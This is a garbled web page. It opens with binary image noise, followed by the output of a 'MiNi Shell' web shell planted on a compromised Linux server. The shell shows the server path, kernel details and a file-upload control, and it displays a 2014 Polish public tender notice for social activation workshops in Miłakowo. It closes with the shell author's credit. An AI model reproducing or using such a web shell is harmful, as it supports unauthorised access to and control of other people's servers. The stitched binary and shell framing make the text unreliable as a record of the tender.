JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140523/175744-N-2014.html

<p class="kh_header"><b>Miłakowo: Usługa zorganizowania działań w ramach aktywnej integracji dla uczestników projektu Program aktywizacji społeczno zawodowej bezrobotnych w gminie Miłakowo</b><br>
<b>Numer ogłoszenia: 175744 - 2014; data zamieszczenia: 23.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Olsztyńska 16, 14-310 Miłakowo, woj. warmińsko-mazurskie, tel. 89 757 83 46, faks 89 758 71 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://milakowo-umig.bip-wm.pl/public/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa zorganizowania działań w ramach aktywnej integracji dla uczestników projektu Program aktywizacji społeczno zawodowej bezrobotnych w gminie Miłakowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa zorganizowania działań w ramach aktywnej integracji dla uczestników projektu Program aktywizacji społeczno zawodowej bezrobotnych w gminie Miłakowo , współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, priorytet VII. Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej , Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
Realizacja działań projektowych obejmować powinna działania związane z wykorzystaniem usług specjalistów zarówno w szkoleniach i warsztatach i treningach.
Działania te zostały podzielone na 5 części: 
CZĘŚĆ I 
1). Trening umiejętności wychowawczych, który ma za zadanie zwiększenie zaradności życiowej oraz podwyższenia świadomości pełnienia właściwych ról społecznych. Celem warsztatów jest:  nabycie przez uczestników umiejętności wychowawczych takich jak: umiejętność aktywnego, wspierającego słuchania, nawiązywania efektywnej współpracy z dzieckiem, modyfikowania niepożądanych lub nieodpowiednich zachowań dziecka bez stosowania różnorodnych form przemocy, rozpoznawania, wyrażania i akceptowania uczuć, a także radzenia sobie z trudnymi uczuciami w duchu poszanowania godności osobistej człowieka, pomocy w rozwoju pozytywnego i realistycznego obrazu siebie, swoich możliwości i zdolności, a także wzrostu zaufania i szacunku do siebie jako wartościowego człowieka, mądrego wspierania procesu usamodzielniania się dziecka. 
Termin realizacji- wrzesień 2014 roku. Warsztaty w formie wyjazdowej.
Dokładny termin zajęć ustalony zostanie z Wykonawcą na etapie podpisywania umowy Łączna liczba godzin: 25 godzin. Wsparcie skierowane jest dla 21 uczestników z podziałem na 3 grupy: 
 - Grupa I - osoby młode w wieku 15-30 lat, bezrobotne lub nieaktywne zawodowo.
 - Grupa II - osoby niepełnosprawne. 
- Grupa III- osoby bezrobotne lub nieaktywne zawodowo. 
2) Warsztaty z zakresu zarządzania budżetem domowym. Mające za zadanie uświadomienie efektywnego zarządzania finansami oraz konstruowania planu budżetu domowego. Nauka praktyczna zastosowania podziału na wydatki na które nie mamy wpływu oraz na wydatki na które możemy wpływać. Pozyskanie wiedzy na temat tego ile wydajemy i jak możemy zapanować nad swoimi domowymi finansami. 
Termin realizacji: wrzesień 2014 roku. 
Dokładny termin zajęć ustalony zostanie z Wykonawcą na etapie podpisywania umowy Łączna liczba godzin 10 godzin. Wsparcie skierowane jest dla 21 osób z podziałem na 3 grupy:
- Grupa I - osoby młode w wieku 15-30 lat, bezrobotne lub nieaktywne zawodowo. 
- Grupa II - osoby niepełnosprawne. 
- Grupa III- osoby bezrobotne lub nieaktywne zawodowo. 
CZĘŚĆ II 
Warsztaty edukacyjno - profilaktyczne mające na celu: rozwijanie świadomości i poszanowania własnej seksualności w bliskich relacjach, profilaktyka chorób przenoszonych drogą płciową. Termin realizacji: październik 2014 roku. 
Łączna liczba godzin: 10 godzin. Wsparcie skierowane jest dla 16 kobiet -  uczestniczek projektu. 
CZĘŚĆ III
 1). Indywidualne poradnictwo zawodowe- ma na celu określenie kierunków rozwoju i preferencji osobowych uczestników. Na podstawie zebranych informacji powinien zostać opracowany IPD na postawie którego uczestnicy mogą być zakwalifikowani na indywidualne kursy podnoszące kwalifikacje dobrane odpowiednio do ich preferencji i możliwości zawodowych oraz potrzeb lokalnego rynku pracy. 
Termin realizacji: od momentu podpisania umowy do końca maja 2014 roku . 
Dokładny termin zajęć ustalony zostanie z Wykonawcą na etapie podpisywania umowy. Łączna liczba 42 godzin. Wsparcie skierowane jest dla 21 uczestników z podziałem na 3 grupy: 

- Grupa I - osoby młode w wieku 15-30 lat, bezrobotne lub nieaktywne zawodowo. 
- Grupa II - osoby niepełnosprawne.
-  Grupa III- osoby bezrobotne lub nieaktywne zawodowo. 
2) Warsztaty kompetencji zawodowych - obejmować powinno edukacje personalną i zawodową uczestników, naukę nowych zachowań na rynku pracy umożliwiającą nabycie umiejętności aktywnego poszukiwania pracy, umiejętności przygotowania CV, listu motywacyjnego, pisania pism urzędowych, podań, zapoznawanie z podstawami prawa pracy, odkrywanie zainteresowań uczestników, nauka autoprezentacji i symulowanie rozmowy kwalifikacyjnej z pracodawcą , opanowanie podstaw negocjacji i mediacji. 
Termin realizacji: od momentu podpisania umowy do końca września 2014 roku. 
Dokładny termin zajęć ustalony zostanie z Wykonawcą na etapie podpisywania umowy . Łączna liczba godzin 105. Wsparcie skierowane jest dla 21 uczestników z podziałem na 3 grupy: 
- Grupa I - osoby młode w wieku 15-30 lat, bezrobotne lub nieaktywne zawodowo.
- Grupa II - osoby niepełnosprawne.
- Grupa III - osoby bezrobotne lub nieaktywne zawodowo. 
3) Warsztaty przedsiębiorczości - tworzenie przedsiębiorstwa społecznego, w tym spółdzielni socjalnych, system wsparcia ekonomii społecznej, dobre praktyki - 32 godziny. Wsparcie skierowane jest dla 21 uczestników z podziałem na 3 grupy: 
- Grupa I - osoby młode w wieku 15-30 lat, bezrobotne lub nieaktywne zawodowo. 
- Grupa II - osoby niepełnosprawne. 
- Grupa III- osoby bezrobotne lub nieaktywne zawodowo. 
Termin realizacji czerwiec 2014. Warsztaty w formie wyjazdowej. Dokładny termin zajęć ustalony zostanie z Wykonawcą na etapie podpisywania umowy. 
CZĘŚĆ IV. 
1) Warsztaty z zakresu kompetencji społecznych o następującej tematyce: zajęcia z komunikacji społecznej, naukę radzenia sobie ze stresem i przezwyciężaniem problemów życiowych. 
Termin realizacji: od momentu podpisania umowy do końca czerwca 2014 roku. 
Dokładny termin warsztatu ustalony zostanie z Wykonawcą na etapie podpisywania umowy . Łączna liczba godzin- 30 . Wsparcie skierowane jest dla 21 uczestników z podziałem na 3 grupy:

- Grupa I - osoby młode w wieku 15-30 lat, bezrobotne lub nieaktywne zawodowo.
- Grupa II - osoby niepełnosprawne. 
- Grupa III- osoby bezrobotne lub nieaktywne zawodowo. 
2). Trening komunikacji interpersonalnej mający na celu naukę aktywnego słuchania, zajęcia z zakresu asertywności, zajęcia z zakresu wzrostu poziomu samooceny i poczucia własnej wartości łamanie stereotypów dotyczących miejsca kobiet w życiu społecznym i zawodowym, budowanie porozumienia międzypokoleniowego, nauka obierania sobie celów i sposobów ich realizacji. Termin realizacji: od momentu podpisania umowy do końca lipca 2014 roku. 
Dokładny termin warsztatu ustalony zostanie z Wykonawcą na etapie podpisywania umowy . Łączna liczba godzin- 30 . Wsparcie skierowane jest dla 21 uczestników z podziałem na 3 grupy:
-  Grupa I - osoby młode w wieku 15-30 lat, bezrobotne lub nieaktywne zawodowo.
 - Grupa II - osoby niepełnosprawne. 
- Grupa III- osoby bezrobotne lub nieaktywne zawodowo. 
3). Warsztaty edukacyjno - profilaktyczne o następującej tematyce: profilaktyka uzależnień : alkohol, narkotyki, hazard oraz przeciwdziałanie przemocy i agresji.
 Termin realizacji: październik 2014 roku. Dokładny termin warsztatu ustalony zostanie z Wykonawcą na etapie podpisywania umowy . Łączna liczba godzin- 10 . 
Wsparcie skierowane jest dla 5 mężczyzn- uczestników projektu. 
CZĘŚĆ V. 
Poradnictwo prawne - (metoda realizacji - grupowe poradnictwo prawne z zakresu prawa pracy, rodzinnego, karnego, inne w razie potrzeby. Termin realizacji: październik 2014 roku. 
Dokładny termin warsztatu ustalony zostanie z Wykonawcą na etapie podpisywania umowy . Łączna liczba godzin - 15 godzin . Wsparcie skierowane jest dla 21 uczestników z podziałem na 3 grupy:
- Grupa I - osoby młode w wieku 15-30 lat, bezrobotne lub nieaktywne zawodowo. 
- Grupa II - osoby niepełnosprawne. 
- Grupa III- osoby bezrobotne lub nieaktywne zawodowo..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w sytuacjach kiedy:
- zmieni się liczba Uczestników projektu lub
- jeżeli w trakcie realizacji projektu modyfikacji ulegną Indywidualne Plany Działania Uczestników lub w kolejnych latach koniecznym okaże się zakup usług tego samego rodzaju skierowanych do nowych klientów MOPS lub nowych Uczestników projektów.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-0, 80.50.00.00-9, 85.31.23.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu nie przewiduje się wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku. Zamawiający uzna warunek za spełniony jeżeli Wykonawca przedstawi oświadczenie w formularzu ofertowym zgodnie z art. 44 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku. Zamawiający uzna warunek za spełniony jeżeli Wykonawca przedstawi oświadczenie w formularzu ofertowym zgodnie z art. 44 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku. Zamawiający uzna warunek za spełniony jeżeli Wykonawca przedstawi oświadczenie w formularzu ofertowym zgodnie z art. 44 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że dysponuje i/lub będzie dysponował osobami, które będą odpowiedzialne za świadczenie usług czyli:
CZĘŚĆ I : co najmniej jedna osoba: posiadająca Wykształcenie- wykształcenie wyższe pedagogiczne lub wyższe pedagogiczne o specjalności praca socjalna . Kwalifikacje - posiadająca szkolenie z zakresu przeciwdziałania przemocy w rodzinie
- posiadające szkolenie z zakresu równości szans płci
- Szkolenie z zakresu asysty rodzinnej lub szkoły dla rodziców
Doświadczenie:   posiadająca co najmniej dwuletnie doświadczenie (w czasie ostatnich 5 lat) w zawodzie pedagoga lub pracownika socjalnego 
Przeprowadziła:
1 szkolenie o tematyce  Trening umiejętności wychowawczych
lub o podobnej tematyce.
1. Warsztaty z zakresu zarządzania budżetem domowym
lub w podobnym/równoważnym zakresie.
CZĘŚĆ II -co najmniej jedna osoba: posiadająca Wykształcenie - w zawodzie: pielęgniarka
Doświadczenie: posiadająca co najmniej czteroletnie  doświadczenie (w czasie ostatnich 6 lat) w zawodzie pielęgniarka
Przeprowadziła:
1 warsztaty edukacyjno profilaktyczne
 lub w podobnym/równoważnym zakresie.
CZĘŚĆ III. -co najmniej jedna osoba:
Wykształcenie- posiadające wykształcenie wyższe o kierunku
doradca zawodowy lub posiadająca uprawnienia do
wykonywania zawodu doradcy zawodowego (licencja doradcy
zawodowego)
Kwalifikacje:
-	posiadające szkolenie z zakresu równości szans płci
-	posiadający szkolenia z zakresu zakładania i prowadzenia spółdzielni socjalnych
Doświadczenie- posiadająca co najmniej roczne doświadczenie (w czasie ostatnich 6 lat) w zawodzie doradcy zawodowego Przeprowadziła:
-	1 zajęcia z indywidualnego poradnictwa zawodowego
-	1 warsztaty kompetencji zawodowych
-	1 warsztaty przedsiębiorczości
lub w podobnym/równoważnym zakresie.
CZĘŚĆ IV - co najmniej jedna osoba posiadająca Wykształcenie- wykształcenie wyższe mgr psychologii Doświadczenie- dwuletnie doświadczenie w zawodzie psychologa
Przeprowadziła:
1 Warsztaty z zakresu kompetencji społecznych 
1 Trening komunikacji interpersonalnej
1 Warsztaty edukacyjno - profilaktyczne
lub w podobnym/równoważnym zakresie.
CZĘŚĆ V- co najmniej jedna osoba posiadająca: Wykształcenie - wykształcenie wyższe o kierunku prawo. Doświadczenie- trzyletnie doświadczenie w poradnictwie prawnym
Przeprowadziła 1 zajęcia z podanej w opisie tematyki.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku. Zamawiający uzna warunek za spełniony jeżeli Wykonawca przedstawi oświadczenie w formularzu ofertowym zgodnie z art. 44 ustawy PZP</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana   postanowień   zawartych   w   umowie   może   nastąpić    za   zgodą   obu    stron wyrażoną w formie pisemnej, pod rygorem nieważności, i na zasadach, o których mowa w art. 144 ust.1 ustawy - Prawo zamówień publicznych z dnia 29.01.2004r. (t.j. Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.),
Zamawiający zgodnie z art. 144 ust. 1 ustawy - Prawo zamówień publicznych przewiduje możliwości dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach:
-	osoby wskazane w ofercie jako odpowiedzialne za świadczenie usług za zgodą Zamawiającego będą mogły zostać zastąpione innymi o nie niższych kwalifikacjach, doświadczeniu i wykształceniu,
-	zmianie mogą podlegać omyłki pisarskie nie rzutujące na zamiar i cel stron wynikający z umowy,
-	w przypadku zmian na liście Uczestników projektu i/lub Indywidualnych Planów Działania ilości osób biorących udział w poszczególnych kursach/szkoleniach warsztatach mogą ulec zmianie. Do obliczenia należnego wynagrodzenia zastosuje się wówczas algorytm (cena ryczałtowa za daną część/ilość uczestników przewidzianych SIWZ  ilość Uczestników biorących udział w zajęciach).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://milakowo-umig.bip-wm.pl/public/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Miłakowie, ul. Olsztyńska 6, 14-310 Miłakowo..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2014 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Miłakowie, ul. Olsztyńska 6, 14-310 Miłakowo..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa zorganizowania działań w ramach aktywnej integracji dla uczestników projektu Program aktywizacji społeczno zawodowej bezrobotnych w gminie Miłakowo , współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, priorytet VII. Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej , Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społeczne.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com